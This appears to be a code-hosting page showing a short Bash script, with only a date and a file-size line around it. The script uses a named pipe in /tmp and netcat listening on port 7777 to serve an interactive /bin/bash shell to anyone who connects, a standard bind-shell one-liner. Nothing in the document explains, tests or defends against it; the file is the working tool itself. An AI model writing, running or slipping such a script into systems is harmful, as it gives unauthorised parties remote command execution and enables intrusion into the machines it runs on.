2023-04-12 00:25:33 +02:00

6 lines
108 B
Bash

#!/bin/bash
mkfifo /tmp/f
cat /tmp/f | /bin/bash 2>&1 | nc localhost -l 7777 > /tmp/f \
&& rm /tmp/f